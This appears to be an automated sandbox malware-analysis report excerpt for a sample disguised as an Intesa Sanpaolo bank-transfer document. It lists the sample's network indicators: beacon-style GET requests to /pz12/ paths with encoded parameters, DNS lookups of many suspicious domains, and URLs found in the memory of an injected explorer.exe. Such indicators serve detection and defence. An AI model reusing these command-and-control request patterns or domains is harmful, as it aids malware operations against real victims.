          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.loyalbahis356.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.sxybet88.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=wKkXOPvX+avhNB0WpobAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmeh48r72CNx&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.ainth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.motchillssss.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.hemophilia-treatment-41433.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.paucanyes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=oHprbzlDionZVyQ1tKhLJIMMM9VbSt1+94xivpjLAu060YRgv/mETNkmThmCujjhO3iW&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.ombak99.lolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=QmILE5Yj5FPxS0L9f6nor9rKO5Y2+RnVUWg4I1d5MMTzUgBssQh0GRAykt5Xu8CyVf+z&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.shuaninvolved.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.jnhdh8827.com
          Source: global trafficDNS traffic detected: DNS query: www.loyalbahis356.com
          Source: global trafficDNS traffic detected: DNS query: www.sxybet88.com
          Source: global trafficDNS traffic detected: DNS query: www.ainth.com
          Source: global trafficDNS traffic detected: DNS query: www.motchillssss.top
          Source: global trafficDNS traffic detected: DNS query: www.hemophilia-treatment-41433.bond
          Source: global trafficDNS traffic detected: DNS query: www.paucanyes.com
          Source: global trafficDNS traffic detected: DNS query: www.ombak99.lol
          Source: global trafficDNS traffic detected: DNS query: www.shuaninvolved.site
          Source: global trafficDNS traffic detected: DNS query: www.meidupro.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jun 2024 14:17:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQJlLW8SkiYBMHFnts7gjykOqYs3BXybBPpNHRFAkouMnNPt1KPTATlxh6ESQYSk3GYuqdaepawogs7EV8f%2F3l%2BmF8Z3w1gryXSxlCXOgKcVQrt4NZ6A%2BGoGhFbJkrjkIlHLDCdoW9N"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89749f6dddaf4375-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 30 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 75 61 6e 69 6e 76 6f 6c 76 65 64 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.shuaninvolved.site Port 80</address></body></html>
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2198261625.0000000006A83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3768787331.0000000006A86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2198261625.0000000006A83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3768787331.0000000006A86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2198261625.0000000006A83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3768787331.0000000006A86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2198261625.0000000006A83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3768787331.0000000006A86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000007.00000000.1362225789.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3768692283.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3083096698.0000000006A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000007.00000002.3770057054.0000000007F70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1360029005.00000000027F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3769349674.0000000007320000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000007.00000003.3082878526.000000000BD86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1379438012.000000000BD7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3776882833.000000000BD86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199414956.000000000BD83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1360830781.0000000002730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd;Please
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4hu259.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4hu259.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4hu259.com/pz12/www.vanessasmobilespa.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.4hu259.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ainth.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ainth.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ainth.com/pz12/www.motchillssss.top
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ainth.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cripmz.xyz
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cripmz.xyz/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cripmz.xyz/pz12/www.meidupro.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cripmz.xyzReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ebehemin.com
          Source: explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ebehemin.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ebehemin.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemophilia-treatment-41433.bond
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemophilia-treatment-41433.bond/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemophilia-treatment-41433.bond/pz12/www.paucanyes.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemophilia-treatment-41433.bondReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jnhdh8827.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jnhdh8827.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jnhdh8827.com/pz12/www.loyalbahis356.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jnhdh8827.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loyalbahis356.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loyalbahis356.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loyalbahis356.com/pz12/www.sxybet88.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loyalbahis356.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.meidupro.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.meidupro.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.meidupro.com/pz12/www.4hu259.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.meidupro.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motchillssss.top
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motchillssss.top/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motchillssss.top/pz12/www.hemophilia-treatment-41433.bond
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motchillssss.topReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ombak99.lol
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ombak99.lol/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ombak99.lol/pz12/www.shuaninvolved.site
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ombak99.lolReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.paucanyes.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.paucanyes.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.paucanyes.com/pz12/www.ombak99.lol
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.paucanyes.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuaninvolved.site
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuaninvolved.site/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuaninvolved.site/pz12/www.cripmz.xyz
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shuaninvolved.siteReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surejobzapp.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surejobzapp.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surejobzapp.com/pz12/www.xiangadvanced.site
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surejobzapp.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxybet88.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxybet88.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxybet88.com/pz12/www.ainth.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sxybet88.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vanessasmobilespa.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vanessasmobilespa.com/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vanessasmobilespa.com/pz12/www.surejobzapp.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vanessasmobilespa.comReferer:
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xiangadvanced.site
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xiangadvanced.site/pz12/
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xiangadvanced.site/pz12/www.ebehemin.com
          Source: explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xiangadvanced.siteReferer:
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.activedirectory.
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.li
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.live-int
          Source: explorer.exe, 00000007.00000003.2192144452.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3081656079.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3771486078.00000000089B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexe
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSdX
          Source: explorer.exe, 00000007.00000002.3770457753.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000007.00000002.3770457753.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000007.00000002.3770457753.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.000000000866C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&oc
